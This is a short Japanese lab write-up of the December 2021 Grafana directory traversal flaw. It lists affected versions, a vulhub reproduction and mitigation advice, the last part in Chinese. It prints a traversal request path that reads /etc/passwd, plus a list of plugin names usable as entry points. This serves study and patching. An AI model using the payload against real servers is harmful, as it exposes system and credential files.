1. 脆弱性の説明
Grafana は、クロスプラットフォームのオープンソース データ視覚化 Web アプリケーション プラットフォームです。ユーザーが接続されたデータ ソースを構成すると、Grafana は Web ブラウザーにデータ グラフとアラートを表示できます。2021 年 12 月 6 日、海外のセキュリティ研究者は、Grafana の特定のインターフェイスが静的ファイルを提供すると、攻撃者が悪意のあるリクエストを作成してディレクトリ トラバーサルを引き起こし、システム上のファイルを読み取る可能性があることを明らかにしました。
2. 影響を受けるバージョン
Grafana 8.3.x < 8.3.1
Grafana 8.2.x < 8.2.7
Grafana 8.1.x < 8.1.8
Grafana 8.0.x < 8.0.7
3. 環境構築
vulhubを利用して脆弱性環境を構築します。
ビルドが完了したら、次のサイトにアクセスします。
4. 脆弱性の再発
http://192.168.10.171:3000/login にアクセスしてパケットをキャプチャし、ファイルを正常に読み取るために
リクエスト パスを変更します。/public/plugins/gauge/../../../../../../../../etc/passwd
alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text
5. 安全に関するアドバイス
1、官方已于2021年12月8日发布新版本修复该漏洞,请尽快升级至安全版本。
2、设置Grafana仅对可信地址开放
3、利用Nginx等代理或者负载均衡设备禁止含有 .. 的请求以进行临时防御。